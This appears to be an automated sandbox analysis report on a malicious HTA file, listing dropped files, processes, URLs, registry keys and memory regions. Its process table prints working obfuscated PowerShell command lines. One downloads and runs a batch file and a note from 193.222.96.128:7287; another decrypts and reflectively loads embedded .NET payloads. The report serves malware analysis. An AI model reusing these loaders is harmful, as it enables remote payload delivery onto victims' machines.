Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
hta.hta
|
HTML document, ASCII text, with very long lines (12111), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Roaming\15.bat
|
DOS batch file, ASCII text, with very long lines (51246), with CRLF line terminators
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x52a299a9, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2vpghq5i.h0z.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b2g0nxty.brj.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dmmc2jq0.cdp.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hzzpoyur.gnr.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pnt5imaf.v2k.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wlopwg4f.35s.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Note.txt
|
Unicode text, UTF-8 text, with CRLF line terminators
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
||
|
\Device\ConDrv
|
ASCII text, with very long lines (2141), with CRLF line terminators
|
dropped
|
There are 6 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\SysWOW64\mshta.exe
|
mshta.exe "C:\Users\user\Desktop\hta.hta"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function gkzChlFZJJ($CLgcLN, $kmBiXxhdPBBuVK){[IO.File]::WriteAllBytes($CLgcLN,
$kmBiXxhdPBBuVK)};function EHyqZyfXS($CLgcLN){if($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68399,68407,68407))) -eq $True){rundll32.exe
$CLgcLN }elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68411,68414,68348))) -eq $True){powershell.exe -ExecutionPolicy unrestricted
-File $CLgcLN}elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68408,68414,68404))) -eq $True){misexec /qn /i $CLgcLN}else{Start-Process
$CLgcLN}};function EcjCVmfjLDzFvM($qDNhNUEOwgjE){$pXytQmYCtNpvKlmM = New-Object (wTbQxZaeCBFXfE @(68377,68400,68415,68345,68386,68400,68397,68366,68407,68404,68400,68409,68415));[Net.ServicePointManager]::SecurityProtocol
= [Net.SecurityProtocolType]::TLS12;$kmBiXxhdPBBuVK = $pXytQmYCtNpvKlmM.DownloadData($qDNhNUEOwgjE);return $kmBiXxhdPBBuVK};function
wTbQxZaeCBFXfE($IXRsdNnynXKLzp){$gCTQwIlSnN=68299;$gsScNSXbhsG=$Null;foreach($YPrbcjAFtcNCEhncu in $IXRsdNnynXKLzp){$gsScNSXbhsG+=[char]($YPrbcjAFtcNCEhncu-$gCTQwIlSnN)};return
$gsScNSXbhsG};function odaqkEMluKlVzieGjH(){$nbpUYlNulSp = $env:AppData + '\';$cnysluAIEDXyIH = $nbpUYlNulSp + 'Note.txt';If(Test-Path
-Path $cnysluAIEDXyIH){Invoke-Item $cnysluAIEDXyIH;}Else{ $nzWdArjtuUapYUy = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68377,68410,68415,68400,68345,68415,68419,68415));gkzChlFZJJ
$cnysluAIEDXyIH $nzWdArjtuUapYUy;Invoke-Item $cnysluAIEDXyIH;};$iTWyAvaurQ = $nbpUYlNulSp + '15.bat'; if (Test-Path -Path
$iTWyAvaurQ){EHyqZyfXS $iTWyAvaurQ;}Else{ $YiQQDI = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68348,68352,68345,68397,68396,68415));gkzChlFZJJ
$iTWyAvaurQ $YiQQDI;EHyqZyfXS $iTWyAvaurQ;};;;;}odaqkEMluKlVzieGjH;
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\15.bat" "
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\15.bat"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes',
''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB',
''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb',
''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr',
''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI',
''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg',
''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function
mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object
System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC
(FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD,
6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null);
"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\notepad.exe
|
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Note.txt
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
There are 2 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://193.222.96.128:7287/
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://193.222.96.128:7287/15.ba
|
unknown
|
||
|
http://193.222.
|
unknown
|
||
|
http://193.222.96.128:728
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2.C:
|
unknown
|
||
|
http://193.222.96.
|
unknown
|
||
|
http://193.222.96.128:7
|
unknown
|
||
|
http://193.222.96.128:7287/15
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://193.222.96.128:72
|
unknown
|
||
|
http://193.222.96.128:7287
|
unknown
|
||
|
http://193.222.96.128:7287/Note.txt
|
193.222.96.128
|
||
|
http://193.222.9
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod/C:
|
unknown
|
||
|
http://193.22
|
unknown
|
||
|
http://193.222.96
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
http://193.222.96.1
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://193.222.96.128:
|
unknown
|
||
|
http://193.222.96.128:7287/15.
|
unknown
|
||
|
http://193.2
|
unknown
|
||
|
http://193.222.96.128:7287/15.b
|
unknown
|
||
|
http://193.222
|
unknown
|
||
|
http://193.222.96.128:7287/15.bat
|
193.222.96.128
|
||
|
http://193.222.96.128:7287/1
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://193.222.96.12
|
unknown
|
||
|
http://193.222.96.128
|
unknown
|
There are 27 hidden URLs, click here to show them.
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
193.222.96.128
|
unknown
|
Germany
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\NOTEPAD.EXE.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\NOTEPAD.EXE.ApplicationCompany
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
|
fWindowsOnlyEOL
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
|
fPasteOriginalEOL
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
|
fReverse
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
|
fWrapAround
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
|
fMatchCase
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
There are 14 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
6DD4000
|
heap
|
page read and write
|
||
|
351B000
|
heap
|
page read and write
|
||
|
29635E40000
|
heap
|
page read and write
|
||
|
70F0000
|
trusted library allocation
|
page read and write
|
||
|
6C87000
|
trusted library allocation
|
page read and write
|
||
|
4D58000
|
trusted library allocation
|
page read and write
|
||
|
752000
|
trusted library allocation
|
page read and write
|
||
|
2963B560000
|
trusted library allocation
|
page read and write
|
||
|
3555000
|
heap
|
page read and write
|
||
|
6836000
|
heap
|
page read and write
|
||
|
73E0000
|
trusted library allocation
|
page read and write
|
||
|
2B60000
|
trusted library allocation
|
page read and write
|
||
|
4A00000
|
trusted library allocation
|
page read and write
|
||
|
2B40000
|
heap
|
page read and write
|
||
|
71E9000
|
heap
|
page read and write
|
||
|
755000
|
trusted library allocation
|
page execute and read and write
|
||
|
2963B430000
|
trusted library allocation
|
page read and write
|
||
|
7205000
|
heap
|
page read and write
|
||
|
AC0FCFE000
|
unkown
|
page readonly
|
||
|
4148000
|
trusted library allocation
|
page read and write
|
||
|
29637200000
|
heap
|
page read and write
|
||
|
356A000
|
heap
|
page read and write
|
||
|
296372E9000
|
heap
|
page read and write
|
||
|
705E000
|
stack
|
page read and write
|
||
|
3563000
|
heap
|
page read and write
|
||
|
2B90000
|
heap
|
page read and write
|
||
|
B174000
|
trusted library allocation
|
page read and write
|
||
|
4801000
|
trusted library allocation
|
page read and write
|
||
|
6EC0000
|
trusted library allocation
|
page read and write
|
||
|
AC0F4FB000
|
stack
|
page read and write
|
||
|
682B000
|
heap
|
page read and write
|
||
|
4616000
|
trusted library allocation
|
page read and write
|
||
|
2FDD000
|
stack
|
page read and write
|
||
|
4D6A000
|
trusted library allocation
|
page read and write
|
||
|
2A80000
|
heap
|
page read and write
|
||
|
5E7000
|
stack
|
page read and write
|
||
|
2E2F000
|
unkown
|
page read and write
|
||
|
AC0EFFE000
|
unkown
|
page readonly
|
||
|
680B000
|
heap
|
page read and write
|
||
|
7280000
|
trusted library allocation
|
page read and write
|
||
|
676D000
|
stack
|
page read and write
|
||
|
586000
|
heap
|
page read and write
|
||
|
70C0000
|
trusted library allocation
|
page read and write
|
||
|
6DE3000
|
heap
|
page read and write
|
||
|
4437000
|
heap
|
page read and write
|
||
|
4170000
|
heap
|
page execute and read and write
|
||
|
29C4000
|
heap
|
page read and write
|
||
|
6DDE000
|
heap
|
page read and write
|
||
|
29E2000
|
heap
|
page read and write
|
||
|
7207000
|
heap
|
page read and write
|
||
|
499C000
|
stack
|
page read and write
|
||
|
7070000
|
trusted library allocation
|
page read and write
|
||
|
6AF8000
|
heap
|
page read and write
|
||
|
3490000
|
heap
|
page read and write
|
||
|
2AF0000
|
heap
|
page read and write
|
||
|
682A000
|
heap
|
page read and write
|
||
|
AC0FFFE000
|
unkown
|
page readonly
|
||
|
3595000
|
heap
|
page read and write
|
||
|
29637285000
|
heap
|
page read and write
|
||
|
29636602000
|
heap
|
page read and write
|
||
|
630000
|
heap
|
page read and write
|
||
|
AC10D7E000
|
stack
|
page read and write
|
||
|
29DA000
|
heap
|
page read and write
|
||
|
78D000
|
stack
|
page read and write
|
||
|
29637254000
|
heap
|
page read and write
|
||
|
7B10000
|
trusted library allocation
|
page read and write
|
||
|
AC0F97E000
|
stack
|
page read and write
|
||
|
682A000
|
heap
|
page read and write
|
||
|
5B19000
|
trusted library allocation
|
page read and write
|
||
|
34A3000
|
heap
|
page read and write
|
||
|
3566000
|
heap
|
page read and write
|
||
|
5ED000
|
stack
|
page read and write
|
||
|
40FE000
|
stack
|
page read and write
|
||
|
29635ECE000
|
heap
|
page read and write
|
||
|
29635EC1000
|
heap
|
page read and write
|
||
|
67F8000
|
heap
|
page read and write
|
||
|
683A000
|
heap
|
page read and write
|
||
|
3590000
|
heap
|
page read and write
|
||
|
6C4E000
|
stack
|
page read and write
|
||
|
683A000
|
heap
|
page read and write
|
||
|
6D9A000
|
heap
|
page read and write
|
||
|
2ADF000
|
stack
|
page read and write
|
||
|
71A5000
|
heap
|
page read and write
|
||
|
5189000
|
trusted library allocation
|
page read and write
|
||
|
7EBD000
|
stack
|
page read and write
|
||
|
6832000
|
heap
|
page read and write
|
||
|
35B7000
|
heap
|
page read and write
|
||
|
2B79000
|
trusted library allocation
|
page read and write
|
||
|
6CCB000
|
heap
|
page read and write
|
||
|
4AFC000
|
trusted library allocation
|
page read and write
|
||
|
7160000
|
heap
|
page read and write
|
||
|
2C5D000
|
heap
|
page read and write
|
||
|
3548000
|
heap
|
page read and write
|
||
|
29635E8D000
|
heap
|
page read and write
|
||
|
6DDE000
|
heap
|
page read and write
|
||
|
66CE000
|
stack
|
page read and write
|
||
|
72D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
6D20000
|
heap
|
page read and write
|
||
|
67DE000
|
heap
|
page read and write
|
||
|
3425000
|
heap
|
page read and write
|
||
|
7EC000
|
heap
|
page read and write
|
||
|
71F8000
|
heap
|
page read and write
|
||
|
680B000
|
heap
|
page read and write
|
||
|
51E6000
|
trusted library allocation
|
page read and write
|
||
|
29F1000
|
heap
|
page read and write
|
||
|
73C0000
|
trusted library allocation
|
page read and write
|
||
|
69CD000
|
stack
|
page read and write
|
||
|
29635EB9000
|
heap
|
page read and write
|
||
|
4BCB000
|
trusted library allocation
|
page read and write
|
||
|
6EE0000
|
trusted library allocation
|
page read and write
|
||
|
5CE000
|
stack
|
page read and write
|
||
|
6CDC000
|
heap
|
page read and write
|
||
|
65CE000
|
stack
|
page read and write
|
||
|
350E000
|
heap
|
page read and write
|
||
|
7080000
|
trusted library allocation
|
page read and write
|
||
|
7C60000
|
trusted library allocation
|
page read and write
|
||
|
29635E84000
|
heap
|
page read and write
|
||
|
860000
|
heap
|
page read and write
|
||
|
2BDE000
|
stack
|
page read and write
|
||
|
4EAC000
|
trusted library allocation
|
page read and write
|
||
|
3554000
|
heap
|
page read and write
|
||
|
5181000
|
trusted library allocation
|
page read and write
|
||
|
71CE000
|
heap
|
page read and write
|
||
|
2970000
|
trusted library allocation
|
page read and write
|
||
|
45F6000
|
trusted library allocation
|
page read and write
|
||
|
387A000
|
heap
|
page read and write
|
||
|
4BC5000
|
trusted library allocation
|
page read and write
|
||
|
34F1000
|
heap
|
page read and write
|
||
|
34A7000
|
heap
|
page read and write
|
||
|
723000
|
trusted library allocation
|
page execute and read and write
|
||
|
296372C2000
|
heap
|
page read and write
|
||
|
67DA000
|
heap
|
page read and write
|
||
|
355C000
|
heap
|
page read and write
|
||
|
267A000
|
stack
|
page read and write
|
||
|
29636E30000
|
trusted library section
|
page readonly
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
2963671A000
|
heap
|
page read and write
|
||
|
2963B400000
|
trusted library allocation
|
page read and write
|
||
|
37BE000
|
stack
|
page read and write
|
||
|
739000
|
trusted library allocation
|
page read and write
|
||
|
AC104FE000
|
stack
|
page read and write
|
||
|
29636E20000
|
trusted library section
|
page readonly
|
||
|
67F9000
|
heap
|
page read and write
|
||
|
29635C20000
|
heap
|
page read and write
|
||
|
AC0F9FE000
|
unkown
|
page readonly
|
||
|
3570000
|
heap
|
page read and write
|
||
|
682A000
|
heap
|
page read and write
|
||
|
29637247000
|
heap
|
page read and write
|
||
|
2C30000
|
heap
|
page read and write
|
||
|
358C000
|
heap
|
page read and write
|
||
|
3519000
|
heap
|
page read and write
|
||
|
683A000
|
heap
|
page read and write
|
||
|
68ED000
|
stack
|
page read and write
|
||
|
3568000
|
heap
|
page read and write
|
||
|
718B000
|
heap
|
page read and write
|
||
|
2A9E000
|
stack
|
page read and write
|
||
|
4E9E000
|
trusted library allocation
|
page read and write
|
||
|
354E000
|
heap
|
page read and write
|
||
|
3590000
|
heap
|
page read and write
|
||
|
5F60000
|
trusted library allocation
|
page read and write
|
||
|
682F000
|
heap
|
page read and write
|
||
|
5620000
|
heap
|
page read and write
|
||
|
7450000
|
trusted library allocation
|
page read and write
|
||
|
6720000
|
heap
|
page execute and read and write
|
||
|
6DC1000
|
heap
|
page read and write
|
||
|
35A5000
|
heap
|
page read and write
|
||
|
6725000
|
heap
|
page execute and read and write
|
||
|
71CA000
|
heap
|
page read and write
|
||
|
7100000
|
trusted library allocation
|
page read and write
|
||
|
702D000
|
stack
|
page read and write
|
||
|
71C7000
|
heap
|
page read and write
|
||
|
49E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2997000
|
heap
|
page read and write
|
||
|
7BD0000
|
heap
|
page read and write
|
||
|
6815000
|
heap
|
page read and write
|
||
|
AC0E71B000
|
stack
|
page read and write
|
||
|
3877000
|
heap
|
page read and write
|
||
|
29ED000
|
heap
|
page read and write
|
||
|
7E70000
|
trusted library allocation
|
page read and write
|
||
|
838000
|
heap
|
page read and write
|
||
|
680B000
|
heap
|
page read and write
|
||
|
AC103FE000
|
unkown
|
page readonly
|
||
|
6EF000
|
stack
|
page read and write
|
||
|
67EE000
|
stack
|
page read and write
|
||
|
750000
|
trusted library allocation
|
page read and write
|
||
|
2800000
|
heap
|
page read and write
|
||
|
29637302000
|
heap
|
page read and write
|
||
|
6DDA000
|
heap
|
page read and write
|
||
|
691E000
|
stack
|
page read and write
|
||
|
5AF1000
|
trusted library allocation
|
page read and write
|
||
|
491E000
|
stack
|
page read and write
|
||
|
6DC6000
|
heap
|
page read and write
|
||
|
49F5000
|
heap
|
page execute and read and write
|
||
|
4920000
|
heap
|
page readonly
|
||
|
67E2000
|
heap
|
page read and write
|
||
|
29F1000
|
heap
|
page read and write
|
||
|
760000
|
heap
|
page read and write
|
||
|
2B10000
|
heap
|
page read and write
|
||
|
6DE6000
|
heap
|
page read and write
|
||
|
7F5000
|
heap
|
page read and write
|
||
|
6832000
|
heap
|
page read and write
|
||
|
686D000
|
stack
|
page read and write
|
||
|
301B000
|
heap
|
page read and write
|
||
|
2C07000
|
heap
|
page read and write
|
||
|
6AD0000
|
heap
|
page read and write
|
||
|
296365E0000
|
trusted library allocation
|
page read and write
|
||
|
4A5E000
|
stack
|
page read and write
|
||
|
6D7D000
|
stack
|
page read and write
|
||
|
3586000
|
heap
|
page read and write
|
||
|
7B20000
|
trusted library allocation
|
page read and write
|
||
|
34C8000
|
heap
|
page read and write
|
||
|
68AA000
|
stack
|
page read and write
|
||
|
83F000
|
heap
|
page read and write
|
||
|
351B000
|
heap
|
page read and write
|
||
|
580000
|
heap
|
page read and write
|
||
|
698E000
|
stack
|
page read and write
|
||
|
536B000
|
trusted library allocation
|
page read and write
|
||
|
29635D20000
|
heap
|
page read and write
|
||
|
6D5E000
|
heap
|
page read and write
|
||
|
73AD000
|
stack
|
page read and write
|
||
|
71DB000
|
heap
|
page read and write
|
||
|
3563000
|
heap
|
page read and write
|
||
|
2963B440000
|
trusted library allocation
|
page read and write
|
||
|
36BE000
|
stack
|
page read and write
|
||
|
668E000
|
stack
|
page read and write
|
||
|
6310000
|
trusted library allocation
|
page read and write
|
||
|
296371E0000
|
trusted library allocation
|
page read and write
|
||
|
29BA000
|
heap
|
page read and write
|
||
|
2963B4E0000
|
trusted library allocation
|
page read and write
|
||
|
354A000
|
heap
|
page read and write
|
||
|
81DC000
|
stack
|
page read and write
|
||
|
7420000
|
trusted library allocation
|
page read and write
|
||
|
71D5000
|
heap
|
page read and write
|
||
|
6DD8000
|
heap
|
page read and write
|
||
|
2963B5A0000
|
remote allocation
|
page read and write
|
||
|
79D000
|
heap
|
page read and write
|
||
|
6CFE000
|
stack
|
page read and write
|
||
|
9A0000
|
heap
|
page read and write
|
||
|
353A000
|
heap
|
page read and write
|
||
|
7B8D000
|
stack
|
page read and write
|
||
|
682F000
|
heap
|
page read and write
|
||
|
34F8000
|
heap
|
page read and write
|
||
|
6F6E000
|
stack
|
page read and write
|
||
|
AC0F8FE000
|
unkown
|
page readonly
|
||
|
B2E0000
|
heap
|
page read and write
|
||
|
AC107FE000
|
unkown
|
page readonly
|
||
|
42F0000
|
heap
|
page read and write
|
||
|
29635EB1000
|
heap
|
page read and write
|
||
|
35A4000
|
heap
|
page read and write
|
||
|
AD02000
|
trusted library allocation
|
page read and write
|
||
|
61BC000
|
stack
|
page read and write
|
||
|
29B5000
|
heap
|
page read and write
|
||
|
2963B540000
|
trusted library allocation
|
page read and write
|
||
|
6CA0000
|
heap
|
page read and write
|
||
|
29636E10000
|
trusted library section
|
page readonly
|
||
|
682B000
|
heap
|
page read and write
|
||
|
67EE000
|
heap
|
page read and write
|
||
|
AC0EEFE000
|
stack
|
page read and write
|
||
|
34C0000
|
heap
|
page read and write
|
||
|
2C5D000
|
heap
|
page read and write
|
||
|
353A000
|
heap
|
page read and write
|
||
|
2940000
|
heap
|
page read and write
|
||
|
34D1000
|
heap
|
page read and write
|
||
|
6C70000
|
heap
|
page execute and read and write
|
||
|
438000
|
stack
|
page read and write
|
||
|
3563000
|
heap
|
page read and write
|
||
|
34FA000
|
heap
|
page read and write
|
||
|
6815000
|
heap
|
page read and write
|
||
|
26D0000
|
heap
|
page read and write
|
||
|
709F000
|
stack
|
page read and write
|
||
|
6EB0000
|
trusted library allocation
|
page read and write
|
||
|
6835000
|
heap
|
page read and write
|
||
|
AC0EDFE000
|
unkown
|
page readonly
|
||
|
74A000
|
trusted library allocation
|
page execute and read and write
|
||
|
732E000
|
stack
|
page read and write
|
||
|
7090000
|
trusted library allocation
|
page read and write
|
||
|
6AEC000
|
heap
|
page read and write
|
||
|
680B000
|
heap
|
page read and write
|
||
|
67E8000
|
heap
|
page read and write
|
||
|
AC0F6FB000
|
stack
|
page read and write
|
||
|
73D0000
|
trusted library allocation
|
page read and write
|
||
|
6F0000
|
heap
|
page read and write
|
||
|
6DDA000
|
heap
|
page read and write
|
||
|
6C80000
|
trusted library allocation
|
page read and write
|
||
|
29635EE2000
|
heap
|
page read and write
|
||
|
6C90000
|
heap
|
page read and write
|
||
|
4181000
|
trusted library allocation
|
page read and write
|
||
|
2963730C000
|
heap
|
page read and write
|
||
|
5F9E000
|
stack
|
page read and write
|
||
|
356D000
|
heap
|
page read and write
|
||
|
4140000
|
trusted library allocation
|
page read and write
|
||
|
2C43000
|
heap
|
page read and write
|
||
|
9EE000
|
unkown
|
page read and write
|
||
|
6D99000
|
heap
|
page read and write
|
||
|
340E000
|
stack
|
page read and write
|
||
|
AC106FB000
|
stack
|
page read and write
|
||
|
296372C8000
|
heap
|
page read and write
|
||
|
2990000
|
heap
|
page read and write
|
||
|
4A9E000
|
stack
|
page read and write
|
||
|
29E9000
|
heap
|
page read and write
|
||
|
6DD4000
|
heap
|
page read and write
|
||
|
29635E5B000
|
heap
|
page read and write
|
||
|
AC0F3FE000
|
unkown
|
page readonly
|
||
|
7C62000
|
trusted library allocation
|
page read and write
|
||
|
5D2E000
